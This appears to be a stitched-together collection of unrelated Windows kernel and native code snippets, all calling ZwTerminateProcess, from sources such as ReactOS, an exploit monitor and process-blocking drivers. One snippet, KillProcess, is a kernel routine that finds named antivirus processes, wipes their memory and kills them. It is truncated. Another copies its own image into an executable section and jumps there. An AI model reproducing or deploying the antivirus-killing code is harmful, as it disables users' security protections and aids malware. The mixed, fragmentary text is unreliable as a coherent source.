VOID RtlAssert( IN PVOID FailedAssertion, IN PVOID FileName, IN ULONG LineNumber, IN PCHAR Message OPTIONAL ) { #if DBG || RTL_ASSERT_ALWAYS_ENABLED char Response[ 2 ]; CONTEXT Context; #ifndef BLDR_KERNEL_RUNTIME RtlCaptureContext( &Context ); #endif while (TRUE) { DbgPrint( "\n*** Assertion failed: %s%s\n*** Source File: %s, line %ld\n\n", Message ? Message : "", FailedAssertion, FileName, LineNumber ); DbgPrompt( "Break, Ignore, Terminate Process or Terminate Thread (bipt)? ", Response, sizeof( Response ) ); switch (Response[0]) { case 'B': case 'b': DbgPrint( "Execute '!cxr %p' to dump context\n", &Context); DbgBreakPoint(); break; case 'I': case 'i': return; case 'P': case 'p': ZwTerminateProcess( NtCurrentProcess(), STATUS_UNSUCCESSFUL ); break; case 'T': case 't': ZwTerminateThread( NtCurrentThread(), STATUS_UNSUCCESSFUL ); break; } } DbgBreakPoint(); ZwTerminateProcess( NtCurrentProcess(), STATUS_UNSUCCESSFUL ); #endif }
/******************************************************************************* * * 函 数 名 : CreateProcessNotifyRoutine * 功能描述 : 判断创建的进程是否为拒绝运行程序,是的话结束 * 参数列表 : * 说 明 : 通过PID取得EPROCESS对象,再从里面取名字判断是否为拒绝运行的 * 程序,是的话再通过PID打开进程,结束进程 * 返回结果 : 无 * *******************************************************************************/ VOID CreateProcessNotifyRoutine (IN HANDLE ParentId, IN HANDLE ProcessId, IN BOOLEAN Create ) { PEPROCESS pEProcess = NULL ; OBJECT_ATTRIBUTES ObjectAttributes; CLIENT_ID clientid; HANDLE handle ; return ; // 进程创建 if (Create) { if (0 != ProcessId) { if(NT_SUCCESS(PsLookupProcessByProcessId(ProcessId, &pEProcess))) { ObDereferenceObject(pEProcess) ; // 这里可以再比一下进程名 InitializeObjectAttributes(&ObjectAttributes, 0 ,OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, 0, 0); clientid.UniqueProcess = (HANDLE)ParentId; clientid.UniqueThread=0; if(NT_SUCCESS(ZwOpenProcess(&handle, PROCESS_ALL_ACCESS, &ObjectAttributes, &clientid))) { ZwTerminateProcess(handle, 0) ; } } } } // 程序退出 else { } }
NTSTATUS BDKitTerminateProcessByAPI( __in PEPROCESS EProcess, __in ULONG ExitCode ) { NTSTATUS nsStatus = STATUS_UNSUCCESSFUL; HANDLE hProcess = NULL; BOOLEAN bAttach = FALSE; KAPC_STATE kApcState = {0x00}; do { if ( bAttach == TRUE ) { _KeStackAttachProcess ((PKPROCESS)EProcess, &kApcState); nsStatus = ZwTerminateProcess (0, STATUS_SUCCESS); } else { nsStatus = ObOpenObjectByPointer ( EProcess, OBJ_KERNEL_HANDLE, NULL, PROCESS_ALL_ACCESS, NULL, KernelMode, &hProcess ); BDKit_If_Not_Break(NT_SUCCESS(nsStatus)); nsStatus = ZwTerminateProcess (hProcess, ExitCode); } BDKit_If_Not_Break(NT_SUCCESS(nsStatus)); } while (FALSE); if ( IsKernelHandle(hProcess, KernelMode) ) { BDKitCloseHandle(hProcess); } //BDKitCloseObject(EProcess); return nsStatus; }
void fasttrap_winsig(pid_t pid, uintptr_t addr) { CLIENT_ID cid1 = {(HANDLE) pid, 0}; OBJECT_ATTRIBUTES attr; HANDLE hProcess = 0; NTSTATUS status; UNREFERENCED_PARAMETER(addr); InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &cid1); if (status == STATUS_SUCCESS) { status = ZwTerminateProcess(hProcess, 0); ZwClose(hProcess); } }
// Terminates a given process as well as its child process, and wait for // terminatation of the given process _Use_decl_annotations_ static NTSTATUS EopmonpTerminateProcessTree( HANDLE process_handle, HANDLE pid) { PAGED_CODE(); auto status = ZwTerminateProcess(process_handle, 0); HYPERPLATFORM_LOG_DEBUG( "Exploitation detected. Process %Iu is being terminated (status = %08x).", pid, status); if (status == STATUS_PROCESS_IS_TERMINATING) { return status; } status = EopmonpForEachProcess(EopmonpTerminateProcessIfChild, pid); NT_VERIFY(NT_SUCCESS(status)); status = ZwWaitForSingleObject(process_handle, FALSE, nullptr); NT_VERIFY(NT_SUCCESS(status)); return status; }
// //InteceptProcess is callback notify routine that be set by //PsSetLoadImageNotifyRoutine kernel function // VOID InterceptProcess( IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, // where image is mapped IN PIMAGE_INFO ImageInfo ) { NTSTATUS ntStatus; OBJECT_ATTRIBUTES objAttr; CLIENT_ID ClientId = {0}; HANDLE hCurProcess; ClientId.UniqueProcess = ProcessId; InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL); ntStatus = ZwOpenProcess(&hCurProcess, PROCESS_ALL_ACCESS, &objAttr, &ClientId); if (NT_SUCCESS(ntStatus)) { PROCESS_BASIC_INFORMATION PBICurProc = {0}; ULONG ulRtn; // NtQueryInformationProcess(hProcess, ProcessBasicInformation, &ProcInfo, sizeof (ProcInfo), &ulRtn); ntStatus = NtQueryInformationProcess(hCurProcess, ProcessBasicInformation, &PBICurProc, sizeof (PBICurProc), &ulRtn); KdPrint(("LoadImageNotify: NtQueryInformation ERROR CODE: 0x%08x\n", ntStatus)); if (NT_SUCCESS(ntStatus)) { PEPROCESS pEParent; KdPrint(("LoadImageNotify: NtQueryInformationProcess Successfully!\n")); ntStatus = PsLookupProcessByProcessId((HANDLE)PBICurProc.InheritedFromUniqueProcessId, &pEParent); if (NT_SUCCESS(ntStatus)) { if (IsInterceptionProcess(pEParent)) { KdPrint(("This Process's parent process is TENCENT IM\n")); ZwTerminateProcess(hCurProcess, 0); } ObDereferenceObject(pEParent); } } ZwClose(hCurProcess); } }
// // Native exception filter // LONG NTAPI ExceptionFilter( PEXCEPTION_POINTERS einfo ) { PEXCEPTION_RECORD erec = einfo->ExceptionRecord; if (erec->ExceptionCode != MANUALLY_INITIATED_CRASH) { Print ( "********************************************\n" "* Unhandled exception caught *\n" "********************************************\n" "Exception Record: %08x\n" "Context Record: %08x\n" "********************************************\n" "Exception %08x occurred at %08x\n" "Number parameters: %d\n" "Parameters: %08x %08x %08x %08x\n" "The process will be terminated\n" "********************************************\n" , einfo->ExceptionRecord, einfo->ContextRecord, erec->ExceptionCode, erec->ExceptionAddress, erec->NumberParameters, erec->ExceptionInformation[0], erec->ExceptionInformation[1], erec->ExceptionInformation[2], erec->ExceptionInformation[3] ); } else { ZwTerminateProcess (NtCurrentProcess(), MANUALLY_INITIATED_CRASH); } return EXCEPTION_EXECUTE_HANDLER; }
// Terminates a process if it is created from a dodgy process _Use_decl_annotations_ static bool EopmonpTerminateProcessIfChild( HANDLE pid, void* context) { PAGED_CODE(); const auto dodgy_pid = reinterpret_cast<HANDLE>(context); const auto process_handle = EopmonpOpenProcess(pid); if (!process_handle) { return true; } // Is this process created from the dodgy process? const auto parent_pid = EopmonpGetProcessParentProcessIdByHandle(process_handle); if (parent_pid != dodgy_pid) { goto exit; } // Is this process created later than the dodgy process? const auto create_time = EopmonpGetProcessCreateTimeQuadPart(pid); const auto parent_create_time = EopmonpGetProcessCreateTimeQuadPart(dodgy_pid); if (!create_time || !parent_create_time || create_time <= parent_create_time) { goto exit; } // Yes, terminate this process as well as its child processes auto status = ZwTerminateProcess(process_handle, 0); HYPERPLATFORM_LOG_DEBUG( "Exploitation detected. Process %Iu is being terminated (status = %08x).", pid, status); status = EopmonpForEachProcess(EopmonpTerminateProcessIfChild, pid); NT_VERIFY(NT_SUCCESS(status)); exit:; ZwClose(process_handle); return true; }
/* * @implemented */ VOID NTAPI RtlAssert(IN PVOID FailedAssertion, IN PVOID FileName, IN ULONG LineNumber, IN PCHAR Message OPTIONAL) { CHAR Action[2]; CONTEXT Context; /* Capture caller's context for the debugger */ RtlCaptureContext(&Context); /* Enter prompt loop */ for (;;) { /* Print the assertion */ DbgPrint("\n*** Assertion failed: %s%s\n" "*** Source File: %s, line %lu\n\n", Message != NULL ? Message : "", (PSTR)FailedAssertion, (PSTR)FileName, LineNumber); /* Prompt for action */ DbgPrompt("Break repeatedly, break Once, Ignore," " terminate Process or terminate Thread (boipt)? ", Action, sizeof(Action)); switch (Action[0]) { /* Break repeatedly */ case 'B': case 'b': /* Do a breakpoint, then prompt again */ DbgPrint("Execute '.cxr %p' to dump context\n", &Context); DbgBreakPoint(); break; /* Ignore */ case 'I': case 'i': /* Return to caller */ return; /* Break once */ case 'O': case 'o': /* Do a breakpoint and return */ DbgPrint("Execute '.cxr %p' to dump context\n", &Context); DbgBreakPoint(); return; /* Terminate process*/ case 'P': case 'p': /* Terminate us */ ZwTerminateProcess(ZwCurrentProcess(), STATUS_UNSUCCESSFUL); break; /* Terminate thread */ case 'T': case 't': /* Terminate us */ ZwTerminateThread(ZwCurrentThread(), STATUS_UNSUCCESSFUL); break; /* Unrecognized */ default: /* Prompt again */ break; } } /* Shouldn't get here */ DbgBreakPoint(); ZwTerminateProcess(ZwCurrentProcess(), STATUS_UNSUCCESSFUL); }
NTSTATUS ZwCreateSectionHook(HANDLE SectionHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PLARGE_INTEGER MaximumSize, ULONG SectionPageProtection, ULONG AllocationAttributes, HANDLE FileHandle) { if (/*(DesiredAccess & SECTION_MAP_EXECUTE) && */(AllocationAttributes & SEC_IMAGE) && (SectionPageProtection & PAGE_EXECUTE)) { PEPROCESS pEParent = NULL; PROCESS_BASIC_INFORMATION ProcInfo = {0}; NTSTATUS ntStatus = 0; ULONG ulRtn; HANDLE hProcess; CLIENT_ID ProcID = {0}; OBJECT_ATTRIBUTES objAttr; ProcID.UniqueProcess = PsGetCurrentProcessId(); InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL); ntStatus = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &ProcID); if (NT_SUCCESS(ntStatus)) ntStatus = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &ProcInfo, sizeof (ProcInfo), &ulRtn); if (NT_SUCCESS(ntStatus)) { if (NT_SUCCESS(PsLookupProcessByProcessId((HANDLE)ProcInfo.InheritedFromUniqueProcessId, &pEParent))) { if (IsInterceptionProcess(pEParent)) { //_asm int 3; //KdPrint(("ZwCreateSection Found!!!\n")); // //Update information of pwsCrtProcessEvent // if (pwsCrtProcessEvent == NULL) { pwsCrtProcessEvent = ExAllocatePoolWithTag(PagedPool, (MAX_PATH + 1) * sizeof (wchar_t), 'CP'); if (pwsCrtProcessEvent) { PEPROCESS pEProcess = PsGetCurrentProcess(); PSTR pchParentName = (PSTR)((ULONG_PTR)pEParent + ulProcNameOffset), pchProcessName = (PSTR)((ULONG_PTR)pEProcess + ulProcNameOffset); ANSI_STRING AnsiParentName, AnsiProcessName; UNICODE_STRING uniParentName, uniProcessName; ULONG ulPos = 0; //_asm int 3; RtlZeroMemory(pwsCrtProcessEvent, (MAX_PATH + 1) * sizeof (wchar_t)); RtlInitAnsiString(&AnsiParentName, pchParentName); RtlInitAnsiString(&AnsiProcessName, pchProcessName); RtlAnsiStringToUnicodeString(&uniParentName, &AnsiParentName, TRUE); RtlAnsiStringToUnicodeString(&uniProcessName, &AnsiProcessName, TRUE); RtlStringCchPrintfW(pwsCrtProcessEvent, MAX_PATH, L"%ws;CP;%ws[PID: %ld];TRUE;", uniParentName.Buffer, uniProcessName.Buffer, (ULONG)PsGetCurrentProcessId()); RtlFreeUnicodeString(&uniProcessName); RtlFreeUnicodeString(&uniParentName); if (pKEvtSync[QD_SYNC_EVENTNAME_CRTPROC]) { KeSetEvent(pKEvtSync[QD_SYNC_EVENTNAME_CRTPROC], IO_NO_INCREMENT, FALSE); } KdPrint(("%S\n", pwsCrtProcessEvent)); } } ObDereferenceObject(pEParent); ZwTerminateProcess(hProcess, 0); ZwClose(hProcess); //KdPrint(("ZwCreateSection Found return.\n")); return(0); } ObDereferenceObject(pEParent); } } ZwClose(hProcess); } return(ZwCreateSectionReal(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, SectionPageProtection, AllocationAttributes, FileHandle)); }
NTSTATUS TerminateProcess(HANDLE hProcess, NTSTATUS ExitStatus) { return ZwTerminateProcess(hProcess, ExitStatus); }
void KillProcess(PVOID Context) { NTSTATUS status; HANDLE prohd; BOOLEAN bexe; ULONG puserAddress; KAPC_STATE ApcState; ANSI_STRING imagename; PEPROCESS pepro,ptempepro; LARGE_INTEGER timeout; PSE_AUDIT_PROCESS_CREATION_INFO papc; ANSI_STRING pastr; PVOID pstrb=NULL; while(TRUE) { pepro=PsGetCurrentProcess(); ptempepro=pepro; do { bexe=FALSE; RtlInitAnsiString(&imagename,(PVOID)((ULONG)ptempepro+eprooffset.ImageFileName)); //+0x174 ImageFileName papc=(PSE_AUDIT_PROCESS_CREATION_INFO)((ULONG)ptempepro+eprooffset.SE_AUDIT_PROCESS_CREATION_INFO);//EPROCESS偏移0x1f4处存放着_SE_AUDIT_PROCESS_CREATION_INFO结构的指针 __try { if (papc->ImageFileName->Name.Length!=0) { RtlUnicodeStringToAnsiString(&pastr,&papc->ImageFileName->Name,TRUE); pstrb=strstr(pastr.Buffer,"360"); if (pstrb!=NULL) { bexe=TRUE; } RtlFreeAnsiString(&pastr); } }__except(1){} KillCompare(&imagename,"360tray.exe",&bexe); KillCompare(&imagename,"360safe.exe",&bexe); KillCompare(&imagename,"ZhuDongFangYu.e",&bexe); KillCompare(&imagename,"360rp.exe",&bexe); KillCompare(&imagename,"360sd.exe",&bexe); KillCompare(&imagename,"qqpcrtp.exe",&bexe); KillCompare(&imagename,"qqpcleakscan.ex",&bexe); KillCompare(&imagename,"qqpctray.exe",&bexe); KillCompare(&imagename,"qqpcmgr.exe",&bexe); KillCompare(&imagename,"ksafe.exe",&bexe); KillCompare(&imagename,"kscan.exe",&bexe); KillCompare(&imagename,"kxescore.exe",&bexe); KillCompare(&imagename,"kxetray.exe",&bexe); KillCompare(&imagename,"ksafesvc.exe",&bexe); KillCompare(&imagename,"ksafetray.exe",&bexe); KillCompare(&imagename,"ksmgui.exe",&bexe); KillCompare(&imagename,"ksmsvc.exe",&bexe); KillCompare(&imagename,"avcenter.exe",&bexe); KillCompare(&imagename,"avgnt.exe",&bexe); KillCompare(&imagename,"avguard.exe",&bexe); KillCompare(&imagename,"avshadow.exe",&bexe); KillCompare(&imagename,"sched.exe",&bexe); KillCompare(&imagename,"ravmond.exe",&bexe); KillCompare(&imagename,"rsagent.exe",&bexe); KillCompare(&imagename,"rstray.exe",&bexe); KillCompare(&imagename,"rsmgrsvc.exe",&bexe); if (bexe) { KeStackAttachProcess(ptempepro,&ApcState); for(puserAddress=0;puserAddress<=0x7fffffff;puserAddress+=0x1000) { if(MmIsAddressValid((PVOID)puserAddress)) { __try { ProbeForWrite((PVOID)puserAddress,0x1000,sizeof(ULONG)); RtlZeroMemory((PVOID)puserAddress, 0x1000); }__except(1) { continue; } } else { if(puserAddress>0x1000000)//填这么多足够破坏进程数据了 { break; } } } KeUnstackDetachProcess(&ApcState); status=ObOpenObjectByPointer(ptempepro,0,NULL,PROCESS_ALL_ACCESS,*PsProcessType,KernelMode,&prohd); if (NT_SUCCESS(status)) { ZwTerminateProcess(prohd,0); ZwClose(prohd); } } ptempepro=(PEPROCESS)((ULONG)(*(PULONG)((ULONG)ptempepro+eprooffset.ActiveProcessLinks))-eprooffset.ActiveProcessLinks); //+0x088 ActiveProcessLinks : _LIST_ENTRY } while (ptempepro!=pepro);
int main(int argc, char *argv[]) { if (load_ntdll_functions() == FALSE) { printf("Failed to load NTDLL function\n"); return (-1); } if (load_kernel32_functions() == FALSE) { printf("Failed to load KERNEL32 function\n"); return (-1); } HANDLE hSection = NULL; PVOID ImageBaseAddress = NtCurrentTeb()->Peb->ImageBaseAddress; PIMAGE_NT_HEADERS NtHeaders = RtlImageNtHeader(ImageBaseAddress); if (NtHeaders == NULL) { printf("[ERROR] RtlImageNtHeader failed, error : %d\n", GetLastError()); system("pause"); return (-1); } LARGE_INTEGER MaximumSize; ULONG ImageSize = NtHeaders->OptionalHeader.SizeOfImage; MaximumSize.LowPart = ImageSize; MaximumSize.HighPart = 0; NTSTATUS Status = NULL; if ((Status = ZwCreateSection( &hSection, SECTION_ALL_ACCESS, NULL, &MaximumSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) { printf("[ERROR] ZwCreateSection failed, status : %x\n", Status); system("pause"); return (-1); } printf("Section handle: %x\n", hSection); HANDLE hProcess = NULL; PVOID pSectionBaseAddress = NULL; SIZE_T ViewSize = 0; DWORD dwInheritDisposition = 1; //VIEW_SHARE // map the section in context of current process: if ((Status = NtMapViewOfSection(hSection, GetCurrentProcess(), &pSectionBaseAddress, NULL, NULL, NULL, &ViewSize, dwInheritDisposition, NULL, PAGE_EXECUTE_READWRITE))!= STATUS_SUCCESS) { printf("[ERROR] NtMapViewOfSection failed, status : %x\n", Status); system("pause"); return (-1); } printf("Created new section, BaseAddress: %p ViewSize: %p\n", pSectionBaseAddress, ViewSize); printf("Mapping into: %p <- current image: %p %p\n", pSectionBaseAddress, ImageBaseAddress, ImageSize); RtlCopyMemory(pSectionBaseAddress, ImageBaseAddress, ImageSize); ZwClose(hSection); hSection = NULL; if (applyRelocations(NtHeaders, pSectionBaseAddress) == FALSE) { printf("Applying relocations failed, cannot continue!"); ZwTerminateProcess(GetCurrentProcess(), STATUS_FAILURE); } printf("Applied relocations!\n"); ULONG_PTR offsetFromBase = (ULONG_PTR) &testFunction - (ULONG_PTR)ImageBaseAddress; printf("testFunction offset: %p\n", offsetFromBase); ULONG_PTR newMain = ((ULONG_PTR) pSectionBaseAddress + offsetFromBase); printf("testFunction address in new section: %p\n", newMain); __asm { call newMain }; system("pause"); return (0); }